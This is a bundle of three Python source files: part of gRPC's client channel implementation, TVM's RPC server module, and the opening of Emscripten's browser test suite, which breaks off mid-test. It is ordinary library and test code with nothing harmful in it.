return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
|
server.py | """RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
import signal
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
logger = logging.getLogger('RPCServer')
def _server_env(load_library):
"""Server environment function return temp dir"""
temp = util.tempdir()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library):
"""Server loop"""
sockfd = sock.fileno()
temp = _server_env(load_library)
base._ServerLoop(sockfd)
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr):
"""Listening loop of the server master."""
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
tracker_conn : connnection to tracker
Tracker connection
ping_period : float, optional
ping tracker every k seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.warning("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
raise exc
# step 3: serving
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library))
server_proc.deamon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
def _connect_proxy_loop(addr, key, load_library):
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(base.get_addr_family(addr), socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.warning("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library))
process.deamon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.warning("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a separate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based server with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to be bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
tracker_addr: Tuple (str, int) , optional
The address of RPC Tracker in tuple(host, ip) format.
If is not None, the server will register itself to the tracker.
key : str, optional
The key used to identify the device type in tracker.
load_library : str, optional
List of additional libraries to be loaded during execution.
custom_addr: str, optional
Custom IP Address to Report to RPC Tracker
silent: bool, optional
Whether run this server in silent mode.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None,
silent=False):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.use_popen = use_popen
if silent:
logger.setLevel(logging.ERROR)
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
self.proc = subprocess.Popen(cmd, preexec_fn=os.setsid)
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(base.get_addr_family((host, port)), socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr))
self.proc.deamon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library))
self.proc.deamon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.use_popen:
if self.proc:
os.killpg(self.proc.pid, signal.SIGTERM)
self.proc = None
else:
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir, disabled
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
